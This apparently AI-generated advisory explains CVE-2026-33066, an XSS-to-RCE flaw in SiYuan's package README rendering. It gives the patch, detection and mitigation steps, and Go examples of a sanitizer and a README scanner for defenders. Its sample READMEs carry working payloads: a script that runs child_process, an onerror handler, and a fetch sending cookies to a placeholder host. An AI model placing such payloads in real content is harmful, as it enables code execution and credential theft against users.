CVE-2026-33066 Overview
CVE-2026-33066 is a Cross-Site Scripting (XSS) vulnerability in SiYuan, a personal knowledge management system developed by B3log. The vulnerable code is the kernel's renderPackageREADME function, which renders package README Markdown with a Lute engine created by lute.New() and never calls SetSanitize(true). Lute's HTML sanitizer is opt-in, so raw HTML embedded in the Markdown is copied into the rendered output unmodified. The frontend then assigns that HTML to innerHTML without sanitizing it, so JavaScript embedded in a package README executes in the user's browser context.
What makes this more than an ordinary XSS is SiYuan's Electron configuration: the renderer runs with nodeIntegration: true and contextIsolation: false, so script executing in the page can call Node.js APIs directly, and the XSS escalates to full Remote Code Execution (RCE) on the victim's system.
Critical Impact
A malicious package author can embed arbitrary JavaScript in their README that executes when a user views package details, escalating to full system compromise via Electron's Node.js integration.
Affected Products
- B3log SiYuan versions 3.6.0 and below
Discovery Timeline
- 2026-03-20 - CVE-2026-33066 published to NVD
- 2026-03-23 - Last updated in NVD database
Technical Details for CVE-2026-33066
Vulnerability Analysis
This vulnerability is a straightforward failure of a sanitization control in a Markdown rendering pipeline. The renderPackageREADME function in SiYuan's kernel processes Markdown from package README files but does not enable HTML sanitization in the Lute Markdown engine. Because CommonMark permits raw HTML blocks and inline HTML, the renderer copies attacker-supplied HTML, including script elements and event-handler attributes, straight into its output.
The attack surface is significantly expanded by the application's Electron configuration. With nodeIntegration: true and contextIsolation: false, any JavaScript code executing in the renderer process has direct access to Node.js APIs. This architectural decision transforms what would typically be a client-side XSS issue into a severe Remote Code Execution vulnerability, enabling attackers to execute arbitrary system commands, access the filesystem, and fully compromise the victim's machine.
Root Cause
The root cause is the missing SetSanitize(true) call on the Lute Markdown engine instance in the renderPackageREADME function. The Lute library provides built-in HTML sanitization capabilities, but these must be explicitly enabled. Without this sanitization, any HTML tags including <script> elements pass through the Markdown rendering process unmodified and are subsequently rendered in the Electron application's DOM via innerHTML assignment.
Attack Vector
The attack vector is network-based, requires low privileges and needs user interaction: the attacker publishes a package whose README carries embedded JavaScript, and the payload runs when a victim browses the package marketplace and opens that package's details. Because of the Electron configuration the script is not confined to the page; it can load Node.js modules and execute arbitrary commands on the victim's system.
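To make the root cause concrete, here is an added Go example written for this page; it is not Lute's code and not SiYuan's. A minimal stand-in Renderer type plays the role of the Markdown engine, and its Sanitize flag plays the role of SetSanitize(true). The README text is constructed for the demonstration. With the flag off, the raw script element and the onerror handler reach the output untouched; with it on, they are escaped to inert text. Lute's real sanitizer is an allowlist rather than blanket escaping, but the opt-in behaviour it models is the same.

```go
package main

import (
	"fmt"
	"html"
	"regexp"
	"strings"
)

// Renderer is a deliberately minimal stand-in for a Markdown engine (it is
// NOT Lute). It only knows headings and paragraphs, but it reproduces the one
// property that matters here: like any CommonMark renderer it copies raw HTML
// through verbatim unless a sanitization step is switched on, and that step
// is opt-in, exactly as SetSanitize(true) is in Lute.
type Renderer struct {
	Sanitize bool
}

// Render converts Markdown to HTML. Without Sanitize, a block beginning with
// '<' is raw HTML and is emitted unchanged. With Sanitize, every block is
// HTML-escaped so the browser displays markup as text. Escaping everything is
// stricter than Lute's allowlist sanitizer; it is the safe default when a
// README has no legitimate need for HTML.
func (r Renderer) Render(md string) string {
	var out strings.Builder
	for _, block := range strings.Split(strings.TrimSpace(md), "\n\n") {
		block = strings.TrimSpace(block)
		switch {
		case block == "":
			continue
		case strings.HasPrefix(block, "# "):
			// Heading text is always escaped, as real renderers do.
			out.WriteString("<h1>" + html.EscapeString(block[2:]) + "</h1>\n")
		case strings.HasPrefix(block, "<") && !r.Sanitize:
			// Raw HTML block passed straight to the output: this is the bug.
			out.WriteString(block + "\n")
		case r.Sanitize:
			out.WriteString("<p>" + html.EscapeString(block) + "</p>\n")
		default:
			// Inline HTML inside a paragraph is also passed through unescaped.
			out.WriteString("<p>" + block + "</p>\n")
		}
	}
	return out.String()
}

// activeHTML matches elements that execute or can carry handlers; escaped
// text such as "&lt;script&gt;" does not match.
var activeHTML = regexp.MustCompile(`(?i)<(script|img|svg|iframe)\b`)

// ContainsActiveHTML reports whether rendered HTML still carries an element
// that would run attacker code once assigned to innerHTML.
func ContainsActiveHTML(rendered string) bool {
	return activeHTML.MatchString(rendered)
}

// maliciousREADME is constructed for this demonstration; it does not come
// from any real package.
const maliciousREADME = `# Example package

Install it and enjoy.

<script>require('child_process').exec('calc.exe')</script>

<img src=x onerror="alert(document.domain)">`

func main() {
	unsanitized := Renderer{Sanitize: false}.Render(maliciousREADME)
	sanitized := Renderer{Sanitize: true}.Render(maliciousREADME)
	fmt.Printf("engine without sanitize: active HTML survives = %v\n", ContainsActiveHTML(unsanitized))
	fmt.Printf("engine with sanitize:    active HTML survives = %v\n", ContainsActiveHTML(sanitized))
	fmt.Print(sanitized)
}
```

The point to carry into code review is that the render call and the sanitize setting belong to the same engine instance: a second lute.New() anywhere on the path from README bytes to the frontend reintroduces the bug even after this fix.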
// Security patch showing the fix - Source: GitHub Commit
func renderPackageREADME(linkBase string, mdData []byte) (ret string) {
mdData = bytes.TrimPrefix(mdData, []byte("\\xef\\xbb\\xbf")) // 移除文件开头的 BOM
luteEngine := lute.New()
+ luteEngine.SetSanitize(true)
luteEngine.SetSoftBreak2HardBreak(false)
luteEngine.SetCodeSyntaxHighlight(false)
luteEngine.SetLinkBase(linkBase)
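Review bot: The excerpt stops at the engine configuration and omits the render call that fills ret, so these lines alone do not show that the sanitized luteEngine is the instance whose output is returned; extend the context through the return so a reader can confirm no second engine is created on that path. Two smaller points: as rendered here the BOM prefix reads []byte("\\xef\\xbb\\xbf"), which in Go source is literal backslash characters rather than the three BOM bytes, so check that the commit actually has \xef\xbb\xbf (the doubled backslashes look like an artifact of how this page was extracted); and the comment 移除文件开头的 BOM means "remove the BOM at the start of the file". Finally, SetSanitize(true) hardens this one producer only; the description says the frontend still assigns the result to innerHTML, so any other README or package-metadata path that reaches that sink unsanitized is a separate instance of the same bug and should be reviewed alongside this change.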
Source: GitHub Commit b382f50e
Detection Methods for CVE-2026-33066
Indicators of Compromise
- Unexpected outbound network connections originating from the SiYuan Electron process
- Suspicious child process spawning from the SiYuan application
- README files containing <script> tags, onclick handlers, or other event-based XSS payloads
- Evidence of Node.js API usage in browser-side code such as require('child_process') or fs module calls
Detection Strategies
- Monitor for HTML content containing script tags or JavaScript event handlers in package README files
- Enable Content Security Policy (CSP) violation reporting where a CSP is deployed in the renderer, so inline-script execution attempts are logged; note that a CSP only constrains what the page loads and does not remove Node.js access once script is already running with nodeIntegration enabled
- Analyze application logs for unusual package download or viewing patterns that may indicate exploitation attempts
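One way to act on the README indicators listed above (script tags, event handlers, javascript: URLs and Node.js API calls) is a scanner over the raw Markdown before a package is rendered or installed. The following Go program is an added example for this page, not a SiYuan feature; its rule set and the sample README are constructed here. It skips fenced code blocks, since a Markdown renderer escapes their contents, and reports each remaining suspicious line together with the rule that fired.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Finding is one suspicious construct located in a README.
type Finding struct {
	Rule string // name of the rule that matched
	Line int    // 1-based line number in the Markdown
	Text string // the offending line, trimmed
}

// rules cover the README indicators from the lists above. They are
// case-insensitive and deliberately broad: a match is a triage signal, not
// proof of exploitation.
var rules = []struct {
	name string
	re   *regexp.Regexp
}{
	{"script-tag", regexp.MustCompile(`(?i)<\s*script\b`)},
	// Inline event handlers such as onerror= or onclick=. This can also hit
	// words like "online=", which is acceptable for a triage tool.
	{"event-handler", regexp.MustCompile(`(?i)\son[a-z]+\s*=`)},
	// javascript: URLs in HTML attributes or in Markdown link targets.
	{"javascript-url", regexp.MustCompile(`(?i)((href|src)\s*=\s*["']?|\]\(\s*)javascript:`)},
	{"active-element", regexp.MustCompile(`(?i)<\s*(iframe|object|embed|svg|math)\b`)},
	// Node.js API use that has no business in a README; with nodeIntegration
	// enabled these calls work from the renderer process.
	{"node-api", regexp.MustCompile(`(?i)require\s*\(\s*["'](child_process|fs|net|os)["']\s*\)|process\.(binding|mainModule)`)},
}

// ScanREADME inspects raw Markdown line by line and returns every line that
// matches a rule. Fenced code blocks are skipped: a Markdown renderer escapes
// their contents, so HTML quoted inside them cannot execute.
func ScanREADME(md string) []Finding {
	var findings []Finding
	inFence := false
	for i, line := range strings.Split(md, "\n") {
		trimmed := strings.TrimSpace(line)
		if strings.HasPrefix(trimmed, "```") {
			inFence = !inFence
			continue
		}
		if inFence {
			continue
		}
		for _, r := range rules {
			if r.re.MatchString(line) {
				findings = append(findings, Finding{Rule: r.name, Line: i + 1, Text: trimmed})
			}
		}
	}
	return findings
}

// sampleREADME is constructed for this demonstration; it is not a real
// package README.
var sampleREADME = strings.Join([]string{
	"# Example widget",
	"A harmless description of the widget.",
	"",
	"<script>require('child_process').exec('id')</script>",
	`<img src=x onerror="fetch('https://example.invalid/?c=' + document.cookie)">`,
	"[docs](javascript:alert(1))",
	"",
	"```js",
	"// quoted in a fenced block: rendered as text, so not flagged",
	"<script>alert('ignored')</script>",
	"```",
}, "\n")

func main() {
	for _, f := range ScanREADME(sampleREADME) {
		fmt.Printf("line %d [%s]: %s\n", f.Line, f.Rule, f.Text)
	}
}
```

Run it against the README files under a package directory before trusting them; anything it flags deserves a look at the raw file, since the rendered view is exactly what an attacker controls. Entities such as &lt;script&gt; are not flagged because a renderer leaves them as text.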
Monitoring Recommendations
- Enable process monitoring to detect unusual child processes spawned by the SiYuan Electron application
- Configure network monitoring to identify suspicious outbound connections from the application
- Implement file integrity monitoring on the SiYuan installation directory and user data folders
How to Mitigate CVE-2026-33066
Immediate Actions Required
- Upgrade SiYuan to version 3.6.1 or later immediately
- Avoid viewing package details from untrusted or unknown sources until patched
- Review recently installed packages for suspicious README content
- Consider temporarily disabling package marketplace access if upgrade is not immediately possible
Patch Information
The vulnerability was patched in SiYuan version 3.6.1. The fix adds SetSanitize(true) to the Lute Markdown engine configuration in the renderPackageREADME function, ensuring that raw HTML is properly sanitized before rendering. Users should upgrade to version 3.6.1 or later to remediate this vulnerability. The security patch is documented in the GitHub Security Advisory GHSA-4663-4mpg-879v.
Workarounds
- Disable or restrict access to the package marketplace functionality until the upgrade can be applied
- Implement network-level controls to block access to untrusted package repositories
- Use application sandboxing or containerization to limit potential impact of exploitation
# Verify SiYuan version to ensure patched version is installed
# Check application version in SiYuan settings or about dialog
# Ensure version is 3.6.1 or higher
# For container deployments, pull an image of 3.6.1 or later and recreate the container (pin the release tag rather than :latest where reproducible pulls matter), then re-check the version in the About dialog
docker pull b3log/siyuan:latest
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

